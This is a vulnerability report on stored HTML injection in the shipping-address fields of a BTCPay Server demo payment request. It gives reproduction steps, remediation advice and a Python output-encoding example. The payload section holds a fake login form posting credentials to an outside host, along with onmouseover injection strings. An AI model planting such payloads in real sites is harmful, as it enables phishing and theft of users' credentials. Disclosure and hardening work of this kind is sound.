I hope you are all doing well.
*. I wanted to bring to your attention a potential vulnerability on the website https://mainnet.demo.btcpayserver.org/stores/6YSiuoN6q1yF2ucWZvWojBuVJAJzXxFFUn9cw8iNPPMC/payment-requests/edit/ec575d56-6b8e-41bd-8b9a-bdcda9c5daad.
*. During my research, I discovered that more than five fields under >>> Request payment >>> Request Customer Data on Checkout >>> Request shipping address are vulnerable to a stored HTML injection attack at
https://mainnet.demo.btcpayserver.org/stores/6YSiuoN6q1yF2ucWZvWojBuVJAJzXxFFUn9cw8iNPPMC/payment-requests/edit/ec575d56-6b8e-41bd-8b9a-bdcda9c5daad.
*. I have created a video demonstration of the vulnerability and uploaded it to my Google Drive.
*. The link for the video is provided below for your review:
https://drive.google.com/file/d/1Pn33vZ4TeFovvkK50eVBUGAkeVSfCQf-/view?usp=sharing
*. Go to the website https://mainnet.demo.btcpayserver.org/stores/6YSiuoN6q1yF2ucWZvWojBuVJAJzXxFFUn9cw8iNPPMC/payment-requests
*. Click payment request.
*. Request new payment.
*. Remember to enable the >>> Request customer data on checkout >>> Request shipping address.
*. Create the payment request.
*. Now click View; the user needs to enter the address and other details.
*. Use the following HTML payload in the fields below:
buyerName
buyerAddress1
buyerAddress2
buyerCity
buyerZip
buyerState
buyerCountry
<html><body><head><meta content="text/html; charset=utf-8"></meta></head>
<div><form Method="POST" Action="http://www.test.com/">
Phishingpage :<br /><br />Username :<br /> <input name="User" /><br />Password :<br />
<input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok !" type="submit" />
<br /></form></div></body></html>
<input><input"/onmouseover="confirm(1);//βonload=onload><input><innerHTML><img src="https://www.petmd.com/sites/default/files/Acute-Dog-Diarrhea-47066074.jpg" width="1000" height="750" alt="onmouseover=prompt(1);//" /></a></input>
*. Save this information.
*. Now, cancel payment and move on to the payment request and click edit data.
*. Check that the Request shipping address fields were stored and that the HTML injection is rendered.
*. That's the issue.
*. I tried both HTML and JavaScript injections, but only the HTML injection worked; the JS was blocked by your Content Security Policy.
*. Restrict special characters and HTML-encode attribute values in the input fields.
*. Use regular expressions or other techniques to detect and reject malicious input.
*. Avoid embedding user input into emails unless necessary and always HTML-encode user input before embedding it into emails.
*. Implement proper input validation and sanitization measures to prevent this type of vulnerability from occurring in the future.
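The remediation above comes down to encoding the stored shipping-address values for the context they are rendered in, rather than trusting them. The block below is an added example, not BTCPay Server's code: it takes the field names listed in this report, renders them once the way the report describes (raw interpolation into the edit form) and once with output encoding, and includes a small audit helper for finding already-stored records that contain tag-shaped values. The sample record and the helper names (render_unsafe, render_encoded, fields_with_markup, contains_raw_markup) are constructed for this demonstration.

```python
"""Added example (not BTCPay Server code): output-encode the stored
shipping-address fields before rendering them back in the edit form.

Assumptions (not from the report): the field names are the ones listed in
the report; the sample record and helper functions are constructed here.
"""
import html
import re

# Field names taken from the report. Every value stored under them is
# untrusted because the customer types it into the checkout form.
SHIPPING_FIELDS = (
    "buyerName", "buyerAddress1", "buyerAddress2",
    "buyerCity", "buyerZip", "buyerState", "buyerCountry",
)

# Constructed sample record: mostly benign data plus two fields carrying markup.
SAMPLE_RECORD = {
    "buyerName": "Alice <b>Example</b>",
    "buyerAddress1": '<form action="http://www.test.com/">',
    "buyerAddress2": "",
    "buyerCity": "O'Fallon",
    "buyerZip": "12345",
    "buyerState": "MO & Co",
    "buyerCountry": "US",
}

# Matches anything tag-shaped; used only for auditing stored data.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")


def encode_for_html(value: str) -> str:
    """Escape &, <, >, double and single quotes so the value is inert both
    as a text node and inside a double-quoted attribute."""
    return html.escape(value, quote=True)


def render_unsafe(record: dict) -> str:
    """The pattern the report describes: stored values interpolated raw
    into the edit form, so any markup in them is parsed by the browser."""
    rows = [f'<input name="{k}" value="{record.get(k, "")}">' for k in SHIPPING_FIELDS]
    return "\n".join(rows)


def render_encoded(record: dict) -> str:
    """Hardened version: each value is HTML-encoded before it is placed in
    the value="..." attribute, so stored markup is displayed, not rendered."""
    rows = []
    for k in SHIPPING_FIELDS:
        v = encode_for_html(str(record.get(k, "")))
        rows.append(f'<label>{k}: <input name="{k}" value="{v}"></label>')
    return "\n".join(rows)


def fields_with_markup(record: dict) -> list:
    """Audit aid: names of fields whose stored value already contains
    something tag-shaped. Useful for reviewing existing records; it is not
    a substitute for output encoding."""
    return [k for k in SHIPPING_FIELDS if TAG_RE.search(str(record.get(k, "")))]


def contains_raw_markup(fragment: str, values) -> bool:
    """True if any tag-bearing submitted value survives verbatim in the
    rendered fragment, i.e. it was not encoded on output."""
    return any(TAG_RE.search(v) and v in fragment for v in values if v)


if __name__ == "__main__":
    print("fields carrying markup:", fields_with_markup(SAMPLE_RECORD))
    print("unsafe render leaks markup:", contains_raw_markup(render_unsafe(SAMPLE_RECORD), SAMPLE_RECORD.values()))
    print("encoded render leaks markup:", contains_raw_markup(render_encoded(SAMPLE_RECORD), SAMPLE_RECORD.values()))
```

Encoding is context-specific: html.escape covers text nodes and quoted attribute values, which is where the shipping fields land in the edit form, but a value placed into a URL, a script block or inline CSS would need that context's encoder instead. The audit helper only flags tag-shaped strings and will miss other forms; keep the output encoding as the actual control.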